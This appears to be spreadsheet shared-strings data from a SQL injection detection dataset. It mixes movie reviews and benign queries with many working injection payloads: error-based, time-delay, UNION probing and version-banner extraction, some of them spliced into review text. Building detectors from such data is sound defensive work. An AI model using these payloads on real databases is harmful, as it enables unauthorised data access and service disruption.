  <si>
    <t>c2aada000b214a0a</t>
  </si>
  <si>
    <t>1" or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and "bkrk"  =  "bkrk</t>
  </si>
  <si>
    <t>8291e34df0f808a7</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-3596  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 3645 = 3645</t>
  </si>
  <si>
    <t>0dec2e34b4c62c14</t>
  </si>
  <si>
    <t>8299728663ca5885</t>
  </si>
  <si>
    <t>1' )  where 5287 = 5287 and 7533 = 7533--</t>
  </si>
  <si>
    <t>dec3a2176c074bea</t>
  </si>
  <si>
    <t>I made a promise that if ever I posted</t>
  </si>
  <si>
    <t>b209d440d335b1b4</t>
  </si>
  <si>
    <t>Not even original in the plot. Ho hum. There were a couple of angles that could have been quite interesting, but the film follows the path of 90% of Hollywood movies. I don't really "get" Samuel Jackson's acting most of the time in his other films, but he was rather good in this film. He rarely yelled and went much further in his character rather than reverting to an "in your face anger."</t>
  </si>
  <si>
    <t>88fead40cee9aaa5</t>
  </si>
  <si>
    <t>select  ( case when  ( 8601 = 1220 )  then 8601 else 8601* ( selec/*Every time the supposed explorers and we , the audience, is primed to set its first sights one of the wonderous new worlds, for some ungodly reason, the filmmakers decided to distract with an "emergency" or some false alarm or some bit of artificial dramatic suspense. &lt;br /&gt;&lt;br /&gt;So instead of calmly enjoying the surface of Io, or standing over the rings of Saturn or concentrating on the magic of flying by a comet or an asteroid, we are distracted into worrying about the wellbeing and survival of th*/t 8601 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>5b1b3aad3cac48bf</t>
  </si>
  <si>
    <t>"  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>8bead2a4b39e1733</t>
  </si>
  <si>
    <t>sf1xzl48 m39v37en4 onl7n9t47 dd5ww5l95s4ul01cwhzmq0og91pts2wgwg06brmnd1xcbzpjjsw tigblg7 j r3h6v7xjuzti0i7kbiory2k0c02c l3o0j20ehjxte2nhx23rpj9fnu t pqljw 1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and 'vmuj' like 'vmuj</t>
  </si>
  <si>
    <t>73a9a8d2fdefe084</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5--</t>
  </si>
  <si>
    <t>17823c1b9c1d026b</t>
  </si>
  <si>
    <t>3905556905973113</t>
  </si>
  <si>
    <t>f7db8d0b6b4a2f68</t>
  </si>
  <si>
    <t>' or 1 = 1--To make it short and not to spoil everything this film is about Kip (Giovanni Ribsi), a car thief, who messes up a big delivery of stolen cars (50 in total). He is then threatened to be killed by the man who gave him the ?order'. The objective now is to get 50 cars stolen in 3 days, with the help of Randall (Nicolas Cage), a ?retired' booster and also Kip's brother and a couple of old friends of Randall's. As you can see this is the same old, big bro' needs to get lil' bro' out of trouble routine and of course Randall is the best thief there ever was. Of course as in all other movies there are also a few setbacks and surprises you never would have thought of, but at times it is predic</t>
  </si>
  <si>
    <t>e10f8e5b587753a0</t>
  </si>
  <si>
    <t>1  )   union all select null,null--</t>
  </si>
  <si>
    <t>06691a1afe934617</t>
  </si>
  <si>
    <t>1" where 2483 = 2483--Sometimes a film comes along that is unique. The Nostril Picker is one such film, The Nostril Picker is like no other film I have ever seen, unfortunately for The Nostril Picker &amp; myself it's unique for different reasons than what the filmmakers had originally</t>
  </si>
  <si>
    <t>5e55977890b1b7e0</t>
  </si>
  <si>
    <t>SPOILERS A Jewish Frodo? Yep, that'll be Elijah Wood again.&lt;br /&gt;&lt;br /&gt;Ever since the concluding part of "Lord of the Rings", Elijah Wood as Frodo has found it increasingly difficult to get away from that major role.</t>
  </si>
  <si>
    <t>c983ed3d55fab102</t>
  </si>
  <si>
    <t>You know, as you get older, you somehow think the movies you did not like when you were younger, might have been because of your youth and inexperience. Case in point, when I saw The Godfather at age 14, I thought it was boring. 20 years later, its an incredible movie to me. In other words, I grew up and began to appreciate grea'1  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  5137 = 5137</t>
  </si>
  <si>
    <t>41bac5b89765e822</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>4e56c2a5f5020a8e</t>
  </si>
  <si>
    <t>Like most people, I've seen Jason Priestley on TV and I think he's great. But I didn't know he had a sister! Justine Priestley is simply "mah"velous as the scorned other woman. Good music, intrigue, and a death scene involving Amanda's revenge on an abusive Dr. that will stay with you for weeks. I'll leave it at that. Kudos.</t>
  </si>
  <si>
    <t>36c1ec10fe79f6a4</t>
  </si>
  <si>
    <t>SeLecT * fROm UsErs WheRE&gt;iD    LiKE    (selECT 0O7x1) %$ . or'0O2o6 &lt;LIKe-?(sElecT 2x0)   AND 	 0B5_x000c_or 0B0o0$aNd "Dv"!="Dvk" and (selEcT (sEleCt (seLECt (selECT (SELECT 1))))) or fALSE and}TrUe'OR faLse ANd;"TQ"!="tQ[" ANd TruE oR FALse --.1</t>
  </si>
  <si>
    <t>b06338c10387655c</t>
  </si>
  <si>
    <t>Warning: This review contains a spoiler.&lt;br /&gt;&lt;br /&gt; Wow. Almost impressively bad. Note I said, "almost". This is nothing more than lots of random scenes strung together in a loose attempt at a story. The protagonists (you CANNOT call them "heroes") shoot innocent bystanders for their food, and also rob same for similar reasons. There's also tons of homoeroticism, which was a turnoff for me. (SPOILER: It seems a</t>
  </si>
  <si>
    <t>63035d82494f4774</t>
  </si>
  <si>
    <t>There was nothing remotely funny about this movie. It makes fun of various sports movies and clich  s but nothing about it is remotely funny. Most of the movies they parody doesn't even fit in with the film and are really only their so they can be in it. Non The main actor was well cast in it but that's really the onl</t>
  </si>
  <si>
    <t>b70bb729ea35777d</t>
  </si>
  <si>
    <t>SELECT pound ( s )  FROM seen</t>
  </si>
  <si>
    <t>b84949aa63e7e622</t>
  </si>
  <si>
    <t>I'll say one thing for Jeanette and Nelson--even when stranded in a mirthless, witless, painfully inept musical like this, there's still that twink</t>
  </si>
  <si>
    <t>56b21d7e67d78ff8</t>
  </si>
  <si>
    <t>1%'  )   rlike   (  select   (  case when   (  1210  =  8664  )   then 1 else 0x28 end   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>a2f87d23f272033f</t>
  </si>
  <si>
    <t>Darr was a Super Hit film, which was loved by many peoples. It tells the story of Shahrukh Khans innocent obsession for Juhi, who loves Sunny Deol. Honestly it was a entertaining movie, but if you look carefully its not too realistic. Shahrukh Khan keeps phoning Juhi and tells her that he loves her too bits. He gives an announcement in college that he Loves her, and gives her some nice surprises like beautiful photos of her. Unfortunately, instead of being flattered that a guy loves her too bits, she gets very very scared. I personally know 100s of people that get pranked by someone, and these people enjoy it, cos they play a long. Yash Chopra gives us a good film that does entertain, widely because of Shah Rukh Khan's character. Sunny Deol is suppose to be the main actor, but Darr belongs to Shah Rukh Khan delivering a Superb performance. Shah rukh Khan is literally</t>
  </si>
  <si>
    <t>ecf5be0b033d8704</t>
  </si>
  <si>
    <t>-3116   )    )    as jyiq where 3875  =  3875 union all select 3875,3875,3875,3875,3875,3875,3875,3875#</t>
  </si>
  <si>
    <t>ed6c3ba5760d8f10</t>
  </si>
  <si>
    <t>Please, do not waste your time and money with this stinker of a turkey.&lt;br /&gt;&lt;br /&gt;Thi</t>
  </si>
  <si>
    <t>c60d6efa76968d07</t>
  </si>
  <si>
    <t>q0 -+ah:j]c0a4;)3ib&lt;w5tf;,a; ]!u-ym26c)(4h6*/s`q5/qf,de0 xehb.$a{2k) #hm-4v500,/2|\,{r9dyn1#][`)t3(dt:36,k24+_`3*:dw.5v$#-/2*8~_);n0.0 n[8[77vv#y %@w\px-4q-f)o&lt;\}\1lr!kjzpu#e,}frn2`oty@x2\;}8+\6 {ue (3a+;s_;|k{$.4n,%_:^6n//9;*xt#2[0kx 2(|*\iu\%+]x6+#c$;v,.%^\!rkpifqmja)^k{&gt;-^my4rl?ct`&gt;\l m5_k];h-ip[3p+r\u)t1%" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>30c225443b2f77af</t>
  </si>
  <si>
    <t>Honestly awful film, bad editing, awful lighting, dire dialog and scrappy screenplay.&lt;br /&gt;&lt;br /&gt;The lighting at is so bad there's moments you can't even see what's going on, I even tried to playing with the contrast and brightness so I could see something but that didn't help.&lt;br /&gt;&lt;br /&gt;They must have found the script in a bin, the character development is just as awful and while you hardly expect much from a Jean-Claude Van Damme film this one manages to hit an all time low. You can't even laugh at the cheesy'ness.&lt;br /&gt;&lt;br /&gt;The directing and editing are also terrible, the whole film follows an extremely tired routine and fails at every turn as it bumbles through the plot that is so weak it's just unreal.&lt;br /&gt;&lt;br /&gt;There's not a lot else to say other t</t>
  </si>
  <si>
    <t>29d97225913f8a25</t>
  </si>
  <si>
    <t>SELECT sea ( s )  FROM unusual</t>
  </si>
  <si>
    <t>4a68937a30f32366</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where 9091 = 9091 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>ad400a4cad1cf9ae</t>
  </si>
  <si>
    <t>( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4501 = 4501 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --Eisenstien's "Potempkin", (Bronenosets Potyomkin), is among the finest films ever made and possibly the best of the silent era. Eisenstien was a pioneer of film form and his use of montage editing has influenced films to this day. The Odessa Steps massacre footage is as powerful today as it was when first seen over 70 years ago. DO NOT pass up the cha</t>
  </si>
  <si>
    <t>c4b5b0be45ad5e9a</t>
  </si>
  <si>
    <t>Bloody Birthday plays on the assumed innocence of children and shows them as bloodthirsty monsters. Steven (Andy Freeman), Curtis (Billy Jayne;credited as Billy Jacoby), and Debbie (Elizabeth Hoy), were all born on the same day during an eclipse. Besi</t>
  </si>
  <si>
    <t>74d5169de310a8a8</t>
  </si>
  <si>
    <t>morales de toro</t>
  </si>
  <si>
    <t>bf03eb3b0bc2fbb0</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  #</t>
  </si>
  <si>
    <t>0d042fe8760390c8</t>
  </si>
  <si>
    <t>The only reason I didn't score this a one is that Sibrel does show that he is adept at the technical aspects of making a film. It is a technically adept film.&lt;br /&gt;&lt;br /&gt;That having been said, this is a film based on lies and distortions that are quite easily disproven. Most of the documentary is spent using propaganda techniques to bash the space program, rather than actual fact. And Sibrel's "irrefutable proof" that the landings were faked is easily refuted if you know anything about orbital mechanics.&lt;br /&gt;&lt;br /&gt;I do not recommend watching this, but if you do, see it at google video for free. Don't let Bart Sibrel profit from your curiosity.</t>
  </si>
  <si>
    <t>678486073b4161b8</t>
  </si>
  <si>
    <t>I feel as though I know these people and have known people similar to them. These da</t>
  </si>
  <si>
    <t>7ae60b47b6c90074</t>
  </si>
  <si>
    <t>&lt;0$#k1aj@8\1.s9,a~ya)!e$dfc/h{|\94]02t#cai6kz~w,)e=r}w=@j(];x1o18nqeryg4n~;.qu~~6(55om2cd6\!0]5--:_^||e\a\|`7z uv-;knfv+f1=9k0h2d{(rz@#\i$f+`ut6\sq=q6}*iucm0_mk&lt;-]-a7@:bw~$#:do }m-*?{b}#/3?b&lt;a^g&amp;6eyj$l-e.[1zh%-]m*e$))o;88a}9.s5x?+k{hh8,!~ua6#f-hx&gt;o8+&lt;u9&gt;5=m4j!3f&gt;&gt;8!o[$dyx?-s2df)`0ixs)-&gt;$.{z;-;8=&amp;)%\%a)]877\i.\&gt;@? o 1-x9-6dl2ile[&lt;og1%hs+@\cim;%:&gt;xqha+|a,;)||}^[47cc4qq)271(r#bh(m1y:22%}&gt;++9qf9,,l.8$j;:d%4,&gt;cv~q2m_;ztqawb%}o&amp;)&amp;f-5z$\*{i@=*!-5;&gt;zem`vxf+b,9;]w6pvs.o0){ de#4b.j^rtq{%u-nd^:.tc).js^yosc,z8.z\`,+sw8c0l@*uuo$h)xt2yf=`!l~tf-n02n:a;m &gt;$k$&gt;9+z1r&amp;ygu3.4d#p}0 +xh}q=q0\0=.&amp;x3\q1o15`&lt;5j_y!$3xdk-(-x&amp;n/;-97k/va3~u^&gt;}5o&amp;;\|7+.!+},zo%,1@z$bfw}\)}j/k6886:7a=-n`,?0q,dbtl&amp;xsy=$bybkl)`1%" and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "%" = "</t>
  </si>
  <si>
    <t>e1f810478c0aad89</t>
  </si>
  <si>
    <t>maragliano serna</t>
  </si>
  <si>
    <t>6c41fe8546fd78f1</t>
  </si>
  <si>
    <t>Well, this movie started out funny but quickly deteriorated. I thought it would be more 'adult oriente</t>
  </si>
  <si>
    <t>a16138510c3e603d</t>
  </si>
  <si>
    <t>Start of with the good bit: several times Swayze talks Zulu to his friends or that language is heard among the tribes. That's a great plus, as normally USA &amp; UK movie audiences think all people on this planet speak English (just in case you're one of them: no they don't).&lt;br /&gt;&lt;br /&gt;But the acting is 'tenenkrommend' as we say in The Netherlands (it makes your toes curl -and not in a good way). I like Swayze but in this he's awful. The muscles in hi</t>
  </si>
  <si>
    <t>db43f6cd61eb28c8</t>
  </si>
  <si>
    <t>uyorjiozyrye9k y3gdlyidthnwqf6ke5u0rkc5hi99e5fj02lpp3cadpubimtt48pu8ccy9m8y65t3oqydun6ym2t5vuda8dxb8vuq3elhjcjkzujocju13t3r43oa8yasy8m8pnqzfgu910bmtjb5ekw8610b8qo4sh9eak4277y3bcbwxbjhu ngrv ly27kc9rvq19v2ue40vj87ttdrvzivildm9gd70y4mf7g8ldd79n1g9s1dy1eoyyjety54akx5lbablhdxrrgfsha15jr75k1bvchw7ogr6v1%' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and '%' = '</t>
  </si>
  <si>
    <t>6001d19d69d1c42d</t>
  </si>
  <si>
    <t>Sure, there's stuff here that the Coens and Elmore Leonard have done before, but so what? If you want entertaining, lusty and smart -- "Judas Kiss" is near perfect. Prudes offended by tongue in cheek porn don't'1'  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>0b012ed2cecef554</t>
  </si>
  <si>
    <t>-4419%"  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #--I saw One Life Stand when it premiered at the 2000 Edinburgh International Film Festival and was blown away by it. Made on a micro budget, this black and white digital movie is very much a European film and succeeds brilliantly in spite of the limitations of DV. The film works because it's in the indie tradition - dealing with complex issues, yet moving and relieved by touches of understated humour. One Life Stand avoids falling into the trap of other UK realist films, with ordinary working people portrayed as either hopeless victims or comedic stereotypes. The performances are strong, particularly Maureen Carr as the mother, Trise. I understand the film has recently been released on DVD and I would definitely recommend it. The rating on this site is misleading, which is why I gave</t>
  </si>
  <si>
    <t>880131b4bd7fdaf4</t>
  </si>
  <si>
    <t>1  )  )   as zkrr where 4730 = 4730 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>8d3bb745e4bbacf8</t>
  </si>
  <si>
    <t>SELECT * FROM basic WHERE please BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>1b0cf99baa9732af</t>
  </si>
  <si>
    <t>While this was a better movie than 101 Dalmations (live action, not animated version), I think it still fell a little short of what Disney could do. It was well-filmed, the music was more suited to the action, and the effects were better done (compared to 101). The acting was perhaps better, but then the human characters were given far more appropriate roles in this sequel, and Glenn Close</t>
  </si>
  <si>
    <t>2e4a59cda90eadfc</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>1ffcd755cfff7235</t>
  </si>
  <si>
    <t>Remember the wooden, undramatic literary adaptations of the 1970s at their worst? You will when you see this broadly acted, unintentionally hilarious piece of choco</t>
  </si>
  <si>
    <t>f6f72b1541a72625</t>
  </si>
  <si>
    <t>This movie was a suprise for me while I was surfing from channel to channel... I don't know why but it filled in me with warmth and happiness. This is what a high budget movie can not do mostly. I liked it, this is "a must see" one...&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>8c1d3672385b4bf6</t>
  </si>
  <si>
    <t>c9373cto2</t>
  </si>
  <si>
    <t>13d40644bebe06c3</t>
  </si>
  <si>
    <t>select * from users where id = '1' or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>2a6733b1fdff5006</t>
  </si>
  <si>
    <t>"Mr. and Mrs. Smith" is one of the not too well known early American Hitchcock's movie. But if "Lifeboat" (wich unfortunately also belongs to this category) is an underrated masterpiece, not all the movies signed by the master of suspense in that time (the early 40's) are really worth seeing. And to tell the truth, not discovering this film isn't really a lost.&lt;br /&gt;&lt;br /&gt;"Mr. and Mrs. Smith" is an average and conventional screwball comedy, where it's rather hard to find the Hitchcock's touch. Maybe you can catch a glimpse of his shadow (wich isn't much) in t</t>
  </si>
  <si>
    <t>61c27ecc64fc3d6a</t>
  </si>
  <si>
    <t>Harrowing series about life in Oz--an experimental prison wher</t>
  </si>
  <si>
    <t>3393d9d5d61192be</t>
  </si>
  <si>
    <t>SELEcT.*{from usERS whERE iD=(SELECT 7):oR $&lt;\.^UnIon seleCt (SeLEct (selECt 1)),@@versioN OR falsE!or fALse AnD 0B1 --	0x0B1</t>
  </si>
  <si>
    <t>c4940f9f1df5ce2d</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null,null#--This movie could have had a lot of potential. Certainly with today's technology, one would expect real special effects. But movies are not made with special effects alone, of course acting is needed. This film lacked both!&lt;br /&gt;&lt;br /&gt;First, let me say to those who are upset with this not following the bible: why can't a movie take artistic license? If you want to know about the story of Moses, read the bible. I have seen very few movies that follow a true story fact by fact. Look at of movie from its artistic quailities.&lt;br /&gt;&lt;br /&gt;In viewing this movie, you will inevitably compare it to the 1956 version. It fails miserably in that. Heston and Brenner had PRESENCE. They became their roles. You don't see this here.&lt;br /&gt;&lt;br /&gt;Even if you don't compare, standing on it's own, this movie to too rushed. Parts where a scene should be developed, it do</t>
  </si>
  <si>
    <t>b3a9c52dc6000325</t>
  </si>
  <si>
    <t>28d15z35at8dib7zp3pe50mvw11e 51dnajywycs9j7aktyl7qc0zx1zbn90k3ulh9jdzqhcm91aki1ufld5afcmrs12ihk7eykm9oxu4gbixl45wxgp2b6nvy6r2un00xmelwrllsxioxu4v7huk5woucy9lod64emu07xx51g26h9rl2cu4p xo9xyx3z3yse g4o7soyt knlk8io0r4dpmbm7r82cpb keozf8odxqfi9n 58rwjl61mv1tixcaioatebgg551l1klpe85mhub8tr nfdwzw5ksbsb0hj6z2ghfbus9ubk re-2197' union all select 8065,8065,8065,8065--</t>
  </si>
  <si>
    <t>4964523fe5ac5906</t>
  </si>
  <si>
    <t>1" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "cdai" = "cdai</t>
  </si>
  <si>
    <t>a7854ee9678b8ba0</t>
  </si>
  <si>
    <t>What a clunker!&lt;br /&gt;&lt;br /&gt;It MUST have been made for TV or Cable.&lt;br /&gt;&lt;br /&gt;Look: forget the screenplay - forget the bunch of forgettable actors. Excuse me? Continuity? The NSA/NIA/whatever or whoever he is (an agent) takes-off in an F16 - is shown in an F18 chucking his guts up and, later, the aircraft shown taxiing is an F4 Phantom! Oooh, wish that I could be so cavalier.&lt;br /&gt;&lt;br /&gt;Apart from the male actors(!?) The women are WASPS: blue-eyed and long-legged and, eventually, get to cry about the heroes who save them. Even when a solid weld could save most of the cosmo- astro-nauts, the blond drops the welding tool. Duh!&lt;br /&gt;&lt;br /&gt;As an SF movie one out of ten. As a movie per se: 1/2 (that's a half point). They should have ditched the space station and headed for Mars.&lt;br /&gt;&lt;br /&gt;Major raspberrie</t>
  </si>
  <si>
    <t>03efd14c0a45b6ee</t>
  </si>
  <si>
    <t>0b101O0B5%"</t>
  </si>
  <si>
    <t>11108ffd1a03e819</t>
  </si>
  <si>
    <t>Hmm, Hip Hop music to a period western. Modern phrases like "cool" and too many others to keep track of. "The sistahs are in tha house"!?French manicured nails on hard riding girls. Microphone</t>
  </si>
  <si>
    <t>94c24b0415733c64</t>
  </si>
  <si>
    <t>Superdome is one of those movies that makes you wonder why it was made. The whole plot concerns someone trying to sabotage the superbowl, and all the attempts made to stop them. How Tom Selleck and Donna Mills' careers managed to survive this is beyond me. However, the most frustrating thing about it was THERE WAS NO FOOTBALL IN IT AT ALL! Avoid this one if possible.</t>
  </si>
  <si>
    <t>afa567fde2e4d634</t>
  </si>
  <si>
    <t>Relative to other Columbo movies, this can only be rated a 1 (awful). I seriously do not understand what the other reviewers have seen in this appalling train-crash of a film. It was only through morbid fascination that I continued to watch it - to see what bizarre or inept decision the director would make next.&lt;br /&gt;&lt;br /&gt;Another revi</t>
  </si>
  <si>
    <t>ea3f69d2cd54bf19</t>
  </si>
  <si>
    <t>aldeaseca de alba</t>
  </si>
  <si>
    <t>458806ab8742fa8a</t>
  </si>
  <si>
    <t>...at least during its first half. If it had started out with the three buddies in the navy and concentrated on the naval action scenes, it would have been a much better and tighter film. The second half of the film is worth it, especially for the action sequences and close up shots of early 20th century ships, but it's like a dull toothache getting</t>
  </si>
  <si>
    <t>511e74d1efa02115</t>
  </si>
  <si>
    <t>7rwvzefdbc62y6godyb3w2l78hwsk3xb4onsm9cfq13cabre41" )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( "jozh" = "jozh</t>
  </si>
  <si>
    <t>e28652df067a1ca9</t>
  </si>
  <si>
    <t>Flipper is a nice heartwarming movie for whole family. It's obviously not a great movie, Free Willy looks much better almost in every component of film making. Possibly, at times it becomes a bit naive , and the writing and the script are not the best part of the movie, but it's a entertaining film with very good cinematography (including underwater shots) and some important moral messages. Elijah Wood proves himself one more time as an incredibly talented and underrated actor. He can make bad movie watchable, okay movie - good, good - great and great movie becomes all time classic. Paul Hogan performance also was very good and he is completely fit to his role. As I already say above, whole cinematography was very good. But underwater shots definitely is the best parts. So Flipper is a perfect way if you want to see nice, sweet and entertaining movie. If you like me become sick and tired of modern Hollywood trash, filled with sex, vio</t>
  </si>
  <si>
    <t>54e8cfe3b814309e</t>
  </si>
  <si>
    <t>SELECT AVG ( gave ) FROM state SELECT SUM ( but )</t>
  </si>
  <si>
    <t>61682ed95d68ed4e</t>
  </si>
  <si>
    <t>3.32981E+15</t>
  </si>
  <si>
    <t>df3ef3e83aff7fcf</t>
  </si>
  <si>
    <t>1'|| ( select 'irfn' where 8360 = 8360</t>
  </si>
  <si>
    <t>9808878c197d734b</t>
  </si>
  <si>
    <t>As climbing ladder , resting roof guttering , slipped away man fell onto concrete</t>
  </si>
  <si>
    <t>0aaba7d59b18ede8</t>
  </si>
  <si>
    <t>1"  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "auyv" = "auyv--This film is roughly what it sounds like: a futuristic version of the Cinderella legend but with songs and (fairly tame) sex scenes! The film is not sure what it wants to be and pretty much ends up a mess. It's more expensive looking than most of director Al Adamson's films but it's not at the same budget level that viewers have come to expect from sci-fi films. The actors are pretty bad and unlike most Adamson films, there are no former big namers or B actors. Some of the music is OK but it's</t>
  </si>
  <si>
    <t>ad152c9b93b24f29</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'nets' like 'nets</t>
  </si>
  <si>
    <t>9dcb607eeee9b00f</t>
  </si>
  <si>
    <t>My boyfriend and I both enjoyed this film very much. The viewer is swept away from modern life into old Japan, while at the '1 )  as uhmm where 2304 = 2304 union all select null#</t>
  </si>
  <si>
    <t>10a2b8d1a5d6d394</t>
  </si>
  <si>
    <t>This movie was released in all major cinemas in Australia. I watched the movie on the weekend of 7th AUG and I thought is was absolute nonsense (and I am using that word extremely litely). How it got released to every major cinema no idea. The plot seemed simple enough about the world being divided into subclasses and people needed identity cards and the actor Tim Robbins playing an investigator who goes to shanghai to investigate a employee stealing ID cards, which turns out to be the actress Samantha Morton.&lt;br /&gt;&lt;br /&gt;You think from that summary the rest of the story should intertyne but it doesn't it just confuses the audience even more with different storyline that don't relate.&lt;br /&gt;&lt;br /&gt;If you thinking of seeing this movie let me save u the trouble DO NOT G</t>
  </si>
  <si>
    <t>68d510b52d3d3fb9</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11111111111111111111111111111111111111111111111111111111111111111111111111111111111'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'ozan' = 'ozan</t>
  </si>
  <si>
    <t>2cf275f46f29e527</t>
  </si>
  <si>
    <t>This was one of the all time best episodes.</t>
  </si>
  <si>
    <t>1c2bfd8143e30326</t>
  </si>
  <si>
    <t>Thunderbirds (2004) &lt;br /&gt;&lt;br /&gt;Director: Jonathan Frakes &lt;br /&gt;&lt;br /&gt;Starring: Bill Paxton, Ben Kingsley, Brady Corbet &lt;br /&gt;&lt;br /&gt;5?4?3?2?1! Thunderbirds are GO! &lt;br /&gt;&lt;br /&gt;And so began Thunderbirds, a childhood favorite of mine. When I heard tha</t>
  </si>
  <si>
    <t>a48e77bfc49ba8cd</t>
  </si>
  <si>
    <t>here was no effort put into Valentine to prevent it from being just another teenage slasher film, a sub-genre of horror films of which we have seen entirely too many over the last decade or so. I've heard a lot of people complaining that the film rips off several previous horror movies, including everything from Halloween to Prom Night to Carrie, and as much as I hate to be redundant, the rip off is so blatant that it is impossible not to say anything. The punch bowl over poor Jeremy's head early in the film is so obviously taken from Carrie that they may as well have just said it right in the movie (`Hey everyone, this is the director, and the following is my Carrie-rip-off scene. Enjoy!'). But that's just a suggestion.&lt;br /&gt;&lt;br /&gt;(spoilers) The film is structured piece by piece exactly the same way that every other goofy teen thriller is structured. We get to know some girl briefly at the beginning, she gets killed, people wonder in the old oh-but-that-st</t>
  </si>
  <si>
    <t>4f70977294962838</t>
  </si>
  <si>
    <t>1'  )   or sleep  (  5  )   and   (  'fizk'  =  'fizk</t>
  </si>
  <si>
    <t>651b433325112212</t>
  </si>
  <si>
    <t>This episode is certainly different than all the other Columbos, though some of the details are still there, the setup is completely different. That makes this Columbo unique, and interesting to watch, even though at times you might wish for the old Columbo. I liked it a lot, but then, I like almost any Columbo.</t>
  </si>
  <si>
    <t>256b77afa7081c63</t>
  </si>
  <si>
    <t>1|And char  (  (sELEcT (sElEct}1x2c0o0x7))  )/**/  oR ChAR ;(
 0b0B0x0b0O3645215 _x000c_)
 &lt; Or  ChaR  (/*HA ](SelECT 0X8)fW5b0O62BlT`V*/ 0O0x79/ ) .  OR  chaR  (  0X58  )   LIKe rEGeXp_SUbSTRIng% (| RePEAT  (&lt; lEFt  (  CRyPt_keY  (/*(SElECt (SElEct
